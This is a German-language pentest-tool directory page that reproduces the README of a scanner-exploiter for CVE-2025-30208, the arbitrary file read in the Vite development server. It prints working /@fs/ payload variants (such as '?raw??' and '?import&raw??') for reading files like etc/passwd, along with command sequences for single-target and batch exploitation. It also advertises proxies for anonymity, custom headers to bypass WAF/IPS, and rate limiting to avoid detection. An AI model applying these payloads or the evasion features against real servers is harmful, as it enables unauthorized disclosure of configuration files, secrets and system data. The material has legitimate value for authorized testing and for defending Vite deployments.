Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/th-secforge/cve-2025-30208
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubth-secforge/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 ist eine mittelschwere Schwachstelle zum beliebigen Auslesen von Dateien im Vite-Entwicklungsserver (einem beliebten Frontend-Build-Tool)

Repository anzeigen
144vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔥 CVE-2025-30208 Vite Scanner für beliebiges Dateilesen

Python License Security Status Modular

Erweiterter Schwachstellenscanner für CVE-2025-30208 mit Unternehmensfunktionen

Professionelles Penetrationstest-Tool zur Erkennung der Vite-Schwachstelle für beliebiges Dateilesen

🚀 Schnellstart • 📋 Funktionen • 🔧 Nutzung • 📊 Beispiele • 🛡️ Sicherheit


📖 Übersicht

Dies ist ein umfassender Schwachstellenscanner, der entwickelt wurde, um die CVE-2025-30208-Schwachstelle in Vite-Entwicklungsservern zu erkennen und auszunutzen. Die Schwachstelle ermöglicht beliebiges Dateilesen über die Dateisystem-Endpunkte von Vite und kann sensible Konfigurationsdateien, Quellcode und Systeminformationen preisgeben.

🎯 Was dieses Tool tut

  • Erkennt anfällige Vite-Instanzen in Netzwerken
  • Nutzt die Schwachstelle für beliebiges Dateilesen sicher aus
  • Entdeckt sensible Dateien und Konfigurationsdaten
  • Meldet Ergebnisse in mehreren Formaten (HTML, JSON, Konsole)
  • Verwaltet Scan-Sitzungen und Konfigurationen
  • Behandelt Fehler elegant mit automatischen Wiederholungsmechanismen

🏗️ Modulare Architektur

Das Tool verfügt jetzt über eine modulare Architektur für bessere Wartbarkeit und Erweiterbarkeit:

  • CVE-2025-30208.py - Hauptscanner-Anwendung
  • payloads.py - Erweiterte Exploitation-Payloads (60+ Variationen)
  • sensitive_files.py - Umfassende Datenbank sensibler Dateien (200+)
  • html_template.py - Verbesserte Hacker-ähnliche HTML-Berichtsvorlage

🚀 Schnellstart

Voraussetzungen

pip3 install -r requirements.txt

Grundlegende Nutzung

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Funktionen

🔍 Kern-Schwachstellenerkennung

  • 60+ Erweiterte Payloads: Umfassende Ausnutzungstechniken für maximale Erkennung
  • Intelligente Erkennung: Smarte Antwortanalyse zur Vermeidung von Fehlalarmen
  • Echtzeit-Validierung: Kontinuierliche Validierung der Zielantworten
  • Umfassendes Testen: Testet alle bekannten angreifbaren Endpunkte

🛡️ Erweiterte Sicherheitsfunktionen

  • Proxy-Unterstützung: HTTP/HTTPS-Proxy-Konfiguration für Anonymität
  • Benutzerdefinierte Header: Umgehung von WAF/IPS mit benutzerdefinierten HTTP-Headern
  • Ratenbegrenzung: Konfigurierbare Verzögerungen zur Vermeidung von Erkennung
  • Sitzungsverwaltung: Speichern und Wiederherstellen von Scan-Sitzungen
  • Eingabevalidierung: Umfassende Parameter-Validierung

🔧 Erweiterte Fähigkeiten

  • Batch-Scanning: Multi-Threaded-Scannen mehrerer Ziele
  • Sensible Dateierkennung: Automatische Erkennung von 200+ sensiblen Dateien
  • Konnektivitätstests: TCP/UDP/HTTP/HTTPS-Protokolltests
  • Fehlerbehebung: Automatische Wiederholung mit exponentiellem Backoff
  • Umfassende Protokollierung: Detaillierte Protokolle mit Zeitstempeln

📊 Berichterstattung & Ausgabe

  • 🎨 Verbesserte HTML-Berichte: Schöne Hacker-ähnliche Schwachstellenberichte mit Animationen
  • JSON-Export: Strukturierte Daten für weitere Analysen
  • Konsolenausgabe: Farbcodiertes Echtzeit-Feedback
  • Protokolldateien: Detaillierte Prüfpfade
  • Interaktive Weboberfläche: Integrierter Webserver zum Anzeigen von Berichten

🔧 Nutzungsanleitung

1. Grundkonfiguration

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Schwachstellentest

CVE-2025-30208 > run

# Ausführlichen Modus für detaillierte Ausgabe aktivieren
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Batch-Scanning

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Drücken Sie zweimal die Eingabetaste zum Beenden]

4. Sensible Dateierkennung

CVE-2025-30208 > scan

5. Erweiterte Konfiguration

# Proxy konfigurieren
CVE-2025-30208 > proxy
Geben Sie Proxy ein: http://127.0.0.1:8080

# Benutzerdefinierte Header setzen
CVE-2025-30208 > headers
Geben Sie Header ein: {"User-Agent": "Custom Scanner"}

# Ratenbegrenzung konfigurieren
CVE-2025-30208 > rate
Geben Sie Ratenlimit ein: 1.0

6. Verbesserte HTML-Berichterstattung

# Schönen HTML-Bericht generieren
CVE-2025-30208 > pull

# Webserver zum Anzeigen des Berichts starten
CVE-2025-30208 > web

# Webserver auf bestimmtem Port starten
CVE-2025-30208 > web 8081

# Webserver stoppen
CVE-2025-30208 > web off

📊 Befehlsreferenz

BefehlBeschreibungBeispiel
set <option> <value>Konfigurationsoptionen setzenset RHOST 192.168.1.100
show optionsAktuelle Einstellungen anzeigenshow options
editInteraktiver Optionseditoredit
run / exploitSchwachstellentest ausführenrun
batchMehrere Ziele im Batch scannenbatch
scanSensible Dateien erkennenscan
pullErgebnisse nach HTML/JSON exportierenpull
web [on|off|port]Webserver für HTML-Berichteweb 8080
saveSitzungskonfiguration speichernsave
loadSitzungskonfiguration ladenload
testVerbindung zum Ziel testentest
validateAktuelle Konfiguration validierenvalidate
verboseAusführlichen Modus umschaltenverbose
proxyProxy-Einstellungen konfigurierenproxy
headersBenutzerdefinierte HTTP-Header setzenheaders
rateRatenbegrenzung konfigurierenrate
logProtokollinformationen anzeigenlog
help / ?Hilfe anzeigenhelp
exit / quitTool beendenexit

⚙️ Konfigurationsoptionen

OptionBeschreibungStandardValidierung
RHOSTZiel-Host/IP-Adresse-Hostname/IP-Validierung
RPORTZiel-Portnummer-Portbereich (1-65535)
FILEPATHZu testender Dateipfadetc/passwdPfadvalidierung
PROXYHTTP/HTTPS-Proxy-URL-URL-Format-Validierung
VERBOSEAusführliche Ausgabe aktivierenfalseBoolesche Validierung
RATE_LIMITVerzögerung zwischen Anfragen (Sekunden)0.3Numerische Validierung
THREADSAnzahl der Threads für Batch-Scans5Ganzzahl-Validierung
TIMEOUTAnfrage-Timeout (Sekunden)5Ganzzahl-Validierung
CUSTOM_HEADERSBenutzerdefinierte HTTP-Header (JSON){}JSON-Format-Validierung

🎨 Erweitertes Payload-System

Der Scanner verwendet jetzt 60+ verschiedene Payload-Variationen, organisiert in payloads.py:

Primäre @fs-Payloads

/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

Erweiterte Parameter-Variationen

/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Vite-spezifische Variationen

/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
Tool herunterladen